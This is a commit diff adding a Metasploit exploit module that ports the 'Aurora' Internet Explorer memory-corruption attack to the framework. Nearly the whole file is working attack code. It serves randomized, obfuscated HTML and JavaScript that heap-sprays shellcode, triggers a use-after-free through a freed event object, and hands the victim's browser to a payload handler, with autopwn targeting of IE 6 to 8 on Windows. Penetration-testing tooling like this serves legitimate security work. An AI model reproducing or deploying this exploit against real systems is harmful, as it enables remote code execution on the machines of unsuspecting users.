Metasploit port of the IE "Aurora" exploit, based on this sample: http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js

git-svn-id: file:///home/svn/framework3/trunk@8136 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/ie_aurora.rb

@@ -0,0 +1,161 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({
+		:ua_name    => HttpClients::IE,
+		:ua_minver  => "6.0",
+		:ua_maxver  => "8.0",
+		:javascript => true,
+		:os_name    => OperatingSystems::WINDOWS,
+		:vuln_test  => nil, # no way to test without just trying it
+	})
+
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
+			'Description'    => %q{
+				This module exploits a memory corruption flaw in Internet Explorer. This
+			flaw was found in the wild.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'unknown',
+					'hdm'      # Metasploit port
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
+					['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
+
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1000,
+					'BadChars' => "\x00",
+					'Compat'   =>
+						{
+							'ConnectionType' => '-find',
+						},
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { }],
+				],
+			'DisclosureDate' => 'Jan 14 2009', # wepawet sample
+			'DefaultTarget'  => 0))
+	end
+
+	def on_request_uri(cli, request)
+
+		if (request.uri.match(/\.gif/i))
+			data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
+			send_response(cli, data, { 'Content-Type' => 'image/gif' })
+			return
+		end
+
+		var_memory    = rand_text_alpha(rand(100) + 1)
+		var_boom      = rand_text_alpha(rand(100) + 1)
+		var_x1        = rand_text_alpha(rand(100) + 1)
+		var_e1        = rand_text_alpha(rand(100) + 1)
+		var_e2        = rand_text_alpha(rand(100) + 1)
+
+		var_comment   = rand_text_alpha(rand(100) + 1);
+		var_abc       = rand_text_alpha(3);
+
+		var_ev1       = rand_text_alpha(rand(100) + 1)
+		var_ev2       = rand_text_alpha(rand(100) + 1)
+		var_sp1       = rand_text_alpha(rand(100) + 1)
+
+		var_unescape  = rand_text_alpha(rand(100) + 1)
+		var_shellcode = rand_text_alpha(rand(100) + 1)
+		var_spray     = rand_text_alpha(rand(100) + 1)
+		var_start     = rand_text_alpha(rand(100) + 1)
+		var_i         = rand_text_alpha(rand(100) + 1)
+
+		rand_html     = rand_text_english(rand(400) + 500)
+
+		html = %Q|<html>
+<head>
+<script>
+
+	var #{var_comment} = "COMMENT";
+
+	var #{var_x1} = new Array();
+	for (i = 0; i < 200; i ++ ){
+	   #{var_x1}[i] = document.createElement(#{var_comment});
+	   #{var_x1}[i].data = "#{var_abc}";
+	};
+
+	var #{var_e1} = null;
+
+	var #{var_memory} = new Array();
+	var #{var_unescape} = unescape;
+
+	function #{var_boom}() {
+
+		var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
+
+		var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
+
+		do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
+
+		for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
+	}
+
+	function #{var_ev1}(evt){
+		#{var_boom}();
+	    #{var_e1} = document.createEventObject(evt);
+	    document.getElementById("#{var_sp1}").innerHTML = "";
+	    window.setInterval(#{var_ev2}, 50);
+	}
+
+	function #{var_ev2}(){
+	  p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
+	  for (i = 0; i < #{var_x1}.length; i ++ ){
+	      #{var_x1}[i].data = p;
+	  }
+
+	  var t = #{var_e1}.srcElement;
+	}
+</script>
+</head>
+<body>
+
+<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>
+
+</body>
+</html>
+		|
+
+		# Transmit the compressed response to the client
+		send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
+
+		# Handle the payload
+		handler(cli)
+	end
+end
+